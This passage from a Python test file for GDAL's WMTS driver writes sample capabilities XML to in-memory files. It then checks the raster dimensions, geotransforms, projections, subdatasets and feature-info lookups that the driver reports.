</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/minimal.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-20037508.342799999, 156543.03392811998, 0.0, 20037508.342799999, 0.0, -156543.03392811998)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('3857') < 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterCount != 4:
gdaltest.post_reason('fail')
return 'fail'
for i in range(4):
if ds.GetRasterBand(i+1).GetColorInterpretation() != gdal.GCI_RedBand + i:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetOverviewCount() != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetOverview(0) is not None:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler()
cs = ds.GetRasterBand(1).Checksum()
gdal.PopErrorHandler()
if cs != 0:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetSubDatasets() != []:
gdaltest.post_reason('fail')
print(ds.GetSubDatasets())
return 'fail'
if ds.GetRasterBand(1).GetMetadataItem('Pixel_0_0', 'LocationInfo') is not None:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetRasterBand(1).GetMetadataItem('foo') is not None:
gdaltest.post_reason('fail')
return 'fail'
for connection_str in [ 'WMTS:/vsimem/minimal.xml,layer=',
'WMTS:/vsimem/minimal.xml,style=',
'WMTS:/vsimem/minimal.xml,tilematrixset=',
'WMTS:/vsimem/minimal.xml,tilematrix=',
'WMTS:/vsimem/minimal.xml,zoom_level=',
'WMTS:/vsimem/minimal.xml,layer=,style=,tilematrixset=' ]:
ds = gdal.Open(connection_str)
if ds is None:
gdaltest.post_reason('fail')
print(connection_str)
return 'fail'
ds = None
for connection_str in [ 'WMTS:/vsimem/minimal.xml,layer=foo',
'WMTS:/vsimem/minimal.xml,style=bar',
'WMTS:/vsimem/minimal.xml,tilematrixset=baz',
'WMTS:/vsimem/minimal.xml,tilematrix=baw',
'WMTS:/vsimem/minimal.xml,zoom_level=30' ]:
gdal.PushErrorHandler()
ds = gdal.Open(connection_str)
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
print(connection_str)
return 'fail'
ds = None
ds = gdal.Open('WMTS:/vsimem/minimal.xml')
tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
for i in range(4):
tmp_ds.GetRasterBand(i+1).Fill((i+1)*255/4)
tmp_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/0/0/0.png', tmp_ds)
for i in range(4):
cs = ds.GetRasterBand(i+1).Checksum()
if cs != tmp_ds.GetRasterBand(i+1).Checksum():
gdaltest.post_reason('fail')
return 'fail'
ref_data = tmp_ds.ReadRaster(0,0,256,256)
got_data = ds.ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
if ref_data != got_data:
gdaltest.post_reason('fail')
return 'fail'
ref_data = tmp_ds.GetRasterBand(1).ReadRaster(0,0,256,256)
got_data = ds.GetRasterBand(1).ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
if ref_data != got_data:
gdaltest.post_reason('fail')
return 'fail'
ds = None
wmts_CleanCache()
return 'success'
###############################################################################
# Nominal RESTful
def wmts_14():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/nominal.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<Abstract>My abstract</Abstract>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-180 -85.0511287798065</ows:LowerCorner>
<ows:UpperCorner>180 85.0511287798065</ows:UpperCorner>
</ows:WGS84BoundingBox>
<Dimension>
<ows:Identifier>time</ows:Identifier>
<UOM>ISO8601</UOM>
<Default>2011-10-04</Default>
<Current>false</Current>
<Value>2002-06-01/2011-10-04/P1D</Value>
</Dimension>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<TileMatrixSetLink>
<TileMatrixSet>another_tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>style=auto</Identifier>
<Title>Default style</Title>
</Style>
<Style>
<Identifier>another_style</Identifier>
<Title>Another style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{time}/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
<ResourceURL format="text/plain"
template="/vsimem/{time}/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}/{J}/{I}.txt" resourceType="FeatureInfo"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>tm_0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>tm_18</ows:Identifier>
<ScaleDenominator>2132.72958385</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>262144</MatrixWidth>
<MatrixHeight>262144</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>24</ows:Identifier>
<ScaleDenominator>33.3238997477</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16777216</MatrixWidth>
<MatrixHeight>16777216</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
<TileMatrixSet>
<Identifier>another_tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/nominal.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/nominal.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.GetSubDatasets() != [('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=tms,style="style=auto"',
'Layer My layer1, tile matrix set tms, style "Default style"'),
('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=tms,style=another_style',
'Layer My layer1, tile matrix set tms, style "Another style"'),
('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=another_tms,style="style=auto"',
'Layer My layer1, tile matrix set another_tms, style "Default style"'),
('WMTS:/vsimem/nominal.xml,layer=lyr1,tilematrixset=another_tms,style=another_style',
'Layer My layer1, tile matrix set another_tms, style "Another style"')]:
gdaltest.post_reason('fail')
print(ds.GetSubDatasets())
return 'fail'
if ds.RasterXSize != 67108864:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler()
res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
gdal.PopErrorHandler()
if res != '':
gdaltest.post_reason('fail')
print(res)
return 'fail'
if ds.GetMetadata() != {'ABSTRACT': 'My abstract', 'TITLE': 'My layer1'}:
gdaltest.post_reason('fail')
print(ds.GetMetadata())
return 'fail'
gdal.PushErrorHandler()
gdaltest.wmts_drv.CreateCopy('/vsimem/gdal_nominal.xml', gdal.GetDriverByName('MEM').Create('',1,1))
gdal.PopErrorHandler()
gdaltest.wmts_drv.CreateCopy('/vsimem/gdal_nominal.xml', ds)
ds = None
f = gdal.VSIFOpenL('/vsimem/gdal_nominal.xml', 'rb')
data = gdal.VSIFReadL(1, 10000, f).decode('ascii')
gdal.VSIFCloseL(f)
if data != """<GDAL_WMTS>
<GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl>
<Layer>lyr1</Layer>
<Style>style=auto</Style>
<TileMatrixSet>tms</TileMatrixSet>
<DataWindow>
<UpperLeftX>-20037508.3428</UpperLeftX>
<UpperLeftY>20037508.3428</UpperLeftY>
<LowerRightX>20037508.34278254</LowerRightX>
<LowerRightY>-20037508.34278254</LowerRightY>
</DataWindow>
<BandsCount>4</BandsCount>
<Cache />
<UnsafeSSL>true</UnsafeSSL>
<ZeroBlockHttpCodes>204,404</ZeroBlockHttpCodes>
<ZeroBlockOnServerException>true</ZeroBlockOnServerException>
</GDAL_WMTS>
""":
gdaltest.post_reason('fail')
print(data)
return 'fail'
ds = gdal.Open('/vsimem/gdal_nominal.xml')
gdal.FileFromMemBuffer('/vsimem/2011-10-04/style=auto/tms/tm_18/0/0/2/1.txt', 'foo')
res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
if res != '<LocationInfo>foo</LocationInfo>':
gdaltest.post_reason('fail')
print(res)
return 'fail'
res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
if res != '<LocationInfo>foo</LocationInfo>':
gdaltest.post_reason('fail')
print(res)
return 'fail'
ds = gdal.Open('<GDAL_WMTS><GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl></GDAL_WMTS>')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
for open_options in [ ['URL=/vsimem/nominal.xml'],
['URL=/vsimem/nominal.xml', 'STYLE=style=auto', 'TILEMATRIXSET=tms'] ]:
ds = gdal.OpenEx('WMTS:', open_options = open_options)
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
for open_options in [ ['URL=/vsimem/nominal.xml', 'STYLE=x', 'TILEMATRIXSET=y'],
['URL=/vsimem/nominal.xml', 'STYLE=style=auto', 'TILEMATRIX=30'],
['URL=/vsimem/nominal.xml', 'STYLE=style=auto', 'ZOOM_LEVEL=30'] ]:
gdal.PushErrorHandler()
ds = gdal.OpenEx('WMTS:', open_options = open_options)
gdal.PopErrorHandler()
if ds is not None:
gdaltest.post_reason('fail')
return 'fail'
ds = gdal.Open('WMTS:/vsimem/nominal.xml')
gdal.FileFromMemBuffer('/vsimem/2011-10-04/style=auto/tms/tm_18/0/0/2/1.txt', '<?xml version="1.0" encoding="UTF-8"?><xml_content/>')
res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
if res != """<LocationInfo><xml_content />
</LocationInfo>""":
gdaltest.post_reason('fail')
print(res)
return 'fail'
ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml,tilematrix=tm_0')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
ds = gdal.OpenEx('WMTS:/vsimem/gdal_nominal.xml', open_options = ['tilematrix=tm_0'])
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml,zoom_level=0')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
ds = gdal.OpenEx('WMTS:/vsimem/gdal_nominal.xml', open_options = ['zoom_level=0'])
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
gdal.FileFromMemBuffer('/vsimem/gdal_nominal.xml', """<GDAL_WMTS>
<GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl>
<Layer>lyr1</Layer>
<Style>style=auto</Style>
<TileMatrixSet>tms</TileMatrixSet>
<TileMatrix>tm_0</TileMatrix>
<DataWindow>
<UpperLeftX>-20037508.3428</UpperLeftX>
<UpperLeftY>20037508.3428</UpperLeftY>
<LowerRightX>20037508.34278254</LowerRightX>
<LowerRightY>-20037508.34278254</LowerRightY>
</DataWindow>
<BandsCount>4</BandsCount>
<Cache />
<UnsafeSSL>true</UnsafeSSL>
<ZeroBlockHttpCodes>204,404</ZeroBlockHttpCodes>
<ZeroBlockOnServerException>true</ZeroBlockOnServerException>
</GDAL_WMTS>""")
ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
gdal.FileFromMemBuffer('/vsimem/gdal_nominal.xml', """<GDAL_WMTS>
<GetCapabilitiesUrl>/vsimem/nominal.xml</GetCapabilitiesUrl>
<Layer>lyr1</Layer>
<Style>style=auto</Style>
<TileMatrixSet>tms</TileMatrixSet>
<ZoomLevel>0</ZoomLevel>
<DataWindow>
<UpperLeftX>-20037508.3428</UpperLeftX>
<UpperLeftY>20037508.3428</UpperLeftY>
<LowerRightX>20037508.34278254</LowerRightX>
<LowerRightY>-20037508.34278254</LowerRightY>
</DataWindow>
<BandsCount>4</BandsCount>
<Cache />
<UnsafeSSL>true</UnsafeSSL>
<ZeroBlockHttpCodes>204,404</ZeroBlockHttpCodes>
<ZeroBlockOnServerException>true</ZeroBlockOnServerException>
</GDAL_WMTS>""")
ds = gdal.Open('WMTS:/vsimem/gdal_nominal.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
return 'success'
###############################################################################
# Nominal KVP
def wmts_15():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/nominal_kvp.xml?service=WMTS&request=GetCapabilities', """<Capabilities xmlns="http://www.opengis.net/wmts/1.0">
<ows:OperationsMetadata>
<ows:Operation name="GetCapabilities">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="/vsimem/nominal_kvp.xml?">
<ows:Constraint name="GetEncoding">
<ows:AllowedValues>
<ows:Value>KVP</ows:Value>
</ows:AllowedValues>
</ows:Constraint>
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
<ows:Operation name="GetTile">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="/vsimem/nominal_kvp.xml?">
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
<ows:Operation name="GetFeatureInfo">
<ows:DCP>
<ows:HTTP>
<ows:Get xlink:href="/vsimem/nominal_kvp.xml?">
</ows:Get>
</ows:HTTP>
</ows:DCP>
</ows:Operation>
</ows:OperationsMetadata>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG:6.18:3:3857">
<ows:LowerCorner>-20037508.3428 -20037508.3428</ows:LowerCorner>
<ows:UpperCorner>20037508.3428 20037508.3428</ows:UpperCorner>
</ows:BoundingBox>
<Dimension>
<ows:Identifier>time</ows:Identifier>
<UOM>ISO8601</UOM>
<Default>2011-10-04</Default>
<Current>false</Current>
<Value>2002-06-01/2011-10-04/P1D</Value>
</Dimension>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<Format>image/jpeg</Format>
<Format>image/png</Format>
<InfoFormat>text/plain</InfoFormat>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG:6.18:3:3857">
<ows:LowerCorner>-20037508.3428 -20037508.3428</ows:LowerCorner>
<ows:UpperCorner>20037508.3428 20037508.3428</ows:UpperCorner>
</ows:BoundingBox>
<SupportedCRS>urn:ogc:def:crs:EPSG:6.18:3:3857</SupportedCRS>
<TileMatrix>
<Identifier>0</Identifier>
<ScaleDenominator>559082264.029</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>18</ows:Identifier>
<ScaleDenominator>2132.72958385</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>262144</MatrixWidth>
<MatrixHeight>262144</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>24</ows:Identifier>
<ScaleDenominator>33.3238997477</ScaleDenominator>
<TopLeftCorner>-20037508.3428 20037508.3428</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>16777216</MatrixWidth>
<MatrixHeight>16777216</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
</Capabilities>""")
ds = gdal.Open('/vsimem/nominal_kvp.xml?service=WMTS&request=GetCapabilities')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 67108864:
gdaltest.post_reason('fail')
return 'fail'
gdal.PushErrorHandler()
res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
gdal.PopErrorHandler()
if res != '':
gdaltest.post_reason('fail')
print(res)
return 'fail'
gdaltest.wmts_drv.CreateCopy('/vsimem/gdal_nominal_kvp.xml', ds)
ds = None
ds = gdal.Open('/vsimem/gdal_nominal_kvp.xml')
gdal.FileFromMemBuffer('/vsimem/nominal_kvp.xml?service=WMTS&request=GetFeatureInfo&version=1.0.0&layer=lyr1&style=default_style&InfoFormat=text/plain&TileMatrixSet=tms&TileMatrix=18&TileRow=0&TileCol=0&J=2&I=1&time=2011-10-04', 'bar')
res = ds.GetRasterBand(1).GetMetadataItem('Pixel_1_2', 'LocationInfo')
if res != '<LocationInfo>bar</LocationInfo>':
gdaltest.post_reason('fail')
print(res)
return 'fail'
ds = gdal.Open('WMTS:/vsimem/gdal_nominal_kvp.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
tmp_ds = gdal.GetDriverByName('MEM').Create('',256,256,4)
for i in range(4):
tmp_ds.GetRasterBand(i+1).Fill((i+1)*255/4)
tmp_ds = gdal.GetDriverByName('PNG').CreateCopy('/vsimem/nominal_kvp.xml?service=WMTS&request=GetTile&version=1.0.0&layer=lyr1&style=default_style&format=image/png&TileMatrixSet=tms&TileMatrix=0&TileRow=0&TileCol=0&time=2011-10-04', tmp_ds)
for i in range(4):
cs = ds.GetRasterBand(i+1).GetOverview(0).Checksum()
if cs != tmp_ds.GetRasterBand(i+1).Checksum():
gdaltest.post_reason('fail')
return 'fail'
ref_data = tmp_ds.ReadRaster(0,0,256,256)
got_data = ds.ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
if ref_data != got_data:
gdaltest.post_reason('fail')
return 'fail'
ref_data = tmp_ds.GetRasterBand(1).ReadRaster(0,0,256,256)
got_data = ds.GetRasterBand(1).ReadRaster(0,0,ds.RasterXSize,ds.RasterYSize,256,256)
if ref_data != got_data:
gdaltest.post_reason('fail')
return 'fail'
ds = None
wmts_CleanCache()
return 'success'
###############################################################################
# AOI from layer WGS84BoundingBox
def wmts_16():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_16.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<ows:WGS84BoundingBox>
<ows:LowerCorner>-90 0</ows:LowerCorner>
<ows:UpperCorner>90 90</ows:UpperCorner>
</ows:WGS84BoundingBox>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_16.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_16.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 512:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
return 'success'
###############################################################################
# AOI from layer BoundingBox
def wmts_17():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_17.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>0 -90</ows:LowerCorner>
<ows:UpperCorner>90 90</ows:UpperCorner>
</ows:BoundingBox>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_17.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_17.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 512:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
return 'success'
###############################################################################
# AOI from TileMatrixSet BoundingBox
def wmts_18():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_18.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
<ows:Identifier>GoogleCRS84Quad</ows:Identifier>
<ows:SupportedCRS>urn:ogc:def:crs:EPSG::4326</ows:SupportedCRS>
<ows:BoundingBox crs="urn:ogc:def:crs:EPSG::4326">
<ows:LowerCorner>0 -90</ows:LowerCorner>
<ows:UpperCorner>90 90</ows:UpperCorner>
</ows:BoundingBox>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:0</ows:Identifier>
<ScaleDenominator>5.590822640287178E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>1</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:1</ows:Identifier>
<ScaleDenominator>2.795411320143589E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>2</MatrixWidth>
<MatrixHeight>1</MatrixHeight>
</TileMatrix>
<TileMatrix>
<ows:Identifier>GoogleCRS84Quad:2</ows:Identifier>
<ScaleDenominator>1.397705660071794E8</ScaleDenominator>
<TopLeftCorner>90.0 -180.0</TopLeftCorner>
<TileWidth>256</TileWidth>
<TileHeight>256</TileHeight>
<MatrixWidth>4</MatrixWidth>
<MatrixHeight>2</MatrixHeight>
</TileMatrix>
</TileMatrixSet>
</Contents>
<ServiceMetadataURL xlink:href="/vsimem/wmts_18.xml"/>
</Capabilities>""")
ds = gdal.Open('WMTS:/vsimem/wmts_18.xml')
if ds is None:
gdaltest.post_reason('fail')
return 'fail'
if ds.RasterXSize != 512:
gdaltest.post_reason('fail')
print(ds.RasterXSize)
return 'fail'
if ds.RasterYSize != 256:
gdaltest.post_reason('fail')
print(ds.RasterYSize)
return 'fail'
got_gt = ds.GetGeoTransform()
expected_gt = (-90, 0.3515625, 0.0, 90.0, 0.0, -0.3515625)
for i in range(6):
if abs(got_gt[i] - expected_gt[i]) > 1e-8:
gdaltest.post_reason('fail')
print(got_gt)
return 'fail'
if ds.GetProjectionRef().find('4326') < 0 or ds.GetProjectionRef().find('AXIS') >= 0:
gdaltest.post_reason('fail')
print(ds.GetProjectionRef())
return 'fail'
return 'success'
###############################################################################
# AOI from TileMatrixSetLimits
def wmts_19():
if gdaltest.wmts_drv is None:
return 'skip'
gdal.FileFromMemBuffer('/vsimem/wmts_19.xml', """<Capabilities>
<Contents>
<Layer>
<Identifier>lyr1</Identifier>
<Title>My layer1</Title>
<TileMatrixSetLink>
<TileMatrixSet>tms</TileMatrixSet>
<TileMatrixSetLimits>
<TileMatrixLimits>
<TileMatrix>GoogleCRS84Quad:2</TileMatrix>
<MinTileRow>0</MinTileRow>
<MaxTileRow>0</MaxTileRow>
<MinTileCol>1</MinTileCol>
<MaxTileCol>2</MaxTileCol>
</TileMatrixLimits>
</TileMatrixSetLimits>
</TileMatrixSetLink>
<Style isDefault="true">
<Identifier>default_style</Identifier>
<Title>Default style</Title>
</Style>
<ResourceURL format="image/png"
template="/vsimem/{Style}/{TileMatrixSet}/{TileMatrix}/{TileRow}/{TileCol}.png" resourceType="tile"/>
</Layer>
<TileMatrixSet>
<Identifier>tms</Identifier>
